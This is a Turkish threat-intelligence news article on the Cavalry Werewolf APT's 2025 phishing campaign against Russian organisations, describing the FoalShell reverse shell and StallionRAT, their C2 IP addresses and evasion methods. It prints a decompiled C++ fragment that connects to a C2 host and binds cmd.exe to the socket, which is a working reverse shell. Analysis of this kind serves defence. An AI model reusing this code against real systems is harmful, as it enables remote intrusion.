Mayıs ve Ağustos 2025 arasında Rusya’nın kamu sektörünü ve kritik endüstrileri hedef alan karmaşık bir tehdit kampanyası ortaya çıktı.
YoroTrooper ve Silent Lynx olarak da bilinen Cavalry Werewolf APT grubu, güvenilir hükümet ilişkilerinden yararlanan yüksek hedefli kimlik avı operasyonları aracılığıyla özel olarak oluşturulmuş kötü amaçlı yazılım araç setlerini aktif olarak kullanıyor.
Kampanya, kalıcı erişim ve komut yürütme için tasarlanmış iki temel kötü amaçlı yazılım ailesinden yararlanarak enerji, madencilik ve imalat sektörlerindeki kuruluşlara odaklanıyor.
Tehdit aktörleri, aralarında Ekonomi ve Ticaret Bakanlığı ile Ulaştırma ve Haberleşme Bakanlığı’nın da bulunduğu Kırgızistan’ın meşru devlet kurumlarından gelen resmi yazışmalar gibi görünen hedef odaklı kimlik avı e-postaları kullanıyor.
Bu mesajlar, FoalShell ters kabuk veya StallionRAT uzaktan erişim truva atı içeren RAR arşivlerini taşır ve dosya adları, “ortak operasyonların üç aylık sonuçları” veya “ikramiye alacak çalışanların kısa listesi” gibi orijinal resmi belgeleri taklit edecek şekilde dikkatle hazırlanır.
Saldırganlar, operasyonel güvenilirliklerini artırmak için gerçek resmi e-posta hesaplarını başarıyla ihlal etmiş olabileceklerini gösteren kanıtlarla, kimliğe bürünme ile gerçek uzlaşma arasındaki çizgiyi bulanıklaştırıyor.
Picusgüvenlik analistleri, kötü amaçlı arşivlerin genellikle %LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook dizinine indirildiğini ve bunun Outlook önbellek etkinliğini izleyen güvenlik ekipleri için önemli bir algılama fırsatı sunduğunu belirledi.
Bu kampanyanın karmaşıklığı, grubun teknik çok yönlülüğünü ve operasyonel güvenliğe olan bağlılığını gösteren çok dilli kötü amaçlı yazılım uygulamalarını içeren sosyal mühendislik taktiklerinin ötesine uzanıyor.
Tehdit aktörleri, kötü amaçlı yazılımlarının C#, C++, Go, PowerShell ve Python’da varyantlarını geliştirdi; bunların her biri, temel komuta ve kontrol işlevselliğini korurken farklı mekanizmalar yoluyla tespitten kaçınmak için tasarlandı.
Analiz sırasında keşfedilen masaüstü eserler, grubun Rus hedeflerinin ötesine geçmeye hazırlandığını gösteriyor; Tacik dilindeki dosyalar Tacikistan’a ilgi duyulduğunu gösteriyor ve Arapça isimli belgeler potansiyel Orta Doğu keşiflerine işaret ediyor.
AsyncRAT yükleyici dosyalarının keşfi, grubun gelişen araç setini ve iddialı operasyonel kapsamını daha da öne çıkarıyor.
FoalShell: Çok Dilli Arka Kapı Mimarisi
FoalShell, saldırganlara güvenliği ihlal edilmiş sistemlerde cmd.exe aracılığıyla komut satırı erişimi sağlamak için tasarlanmış hafif ama etkili bir ters kabuk uygulamasını temsil eder.
Kötü amaçlı yazılımın mimarisi programlama dillerine göre farklılık gösteriyor; C# sürümü, gizli pencere stilleri aracılığıyla gizliliği korurken komut ve kontrol sunucularına basit TCP bağlantıları kuruyor.
Temel işlevsellik, komutları alan, bunları cmd.exe aracılığıyla yürüten ve 443 numaralı bağlantı noktasında 188.127.225.191 IP adresinde bulunan C2 altyapısına hem standart hem de hata çıktısını döndüren sürekli bir döngü aracılığıyla çalışır.
C++ çeşidi, kabuk kodu yükleme mekanizmaları aracılığıyla daha karmaşık kaçınma teknikleri kullanır.
Gizlenmiş bir FoalShell kabuk kodu, yürütülebilir dosyanın kaynaklarına “output_bin” adı altında gömülüdür; bu, VirtualAlloc kullanılarak Okuma, Yazma, Yürütme izinleriyle ayrılmış bellekte çıkarılır ve yürütülür.
Kabuk kodu daha sonra C2 sunucusu 109.172.85.63’e ağ bağlantısı kurmadan önce ana ters kabuk kodunun gizliliğini kaldırır.
*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
StartupInfo.dwFlags = 257;
StartupInfo.hStdError = (HANDLE)s;
StartupInfo.hStdOutput = (HANDLE)s;
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);Go uygulaması, 443 numaralı bağlantı noktasındaki 62.113.114.209 numaralı C2 sunucusuna bağlanmak için kendi ağ yığınını kullanır ve HideWindow parametresi 1 olarak ayarlandığında cmd.exe işlemlerini gizli pencere durumlarında çalışmaya zorlar.
Bu çok dilli yaklaşım, saldırganların dağıtım stratejilerini hedef ortamın özelliklerine ve güvenlik duruşuna göre uyarlamalarına olanak tanıyarak, geleneksel imza tabanlı güvenlik çözümlerinin tespitini daha da zorlaştırır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
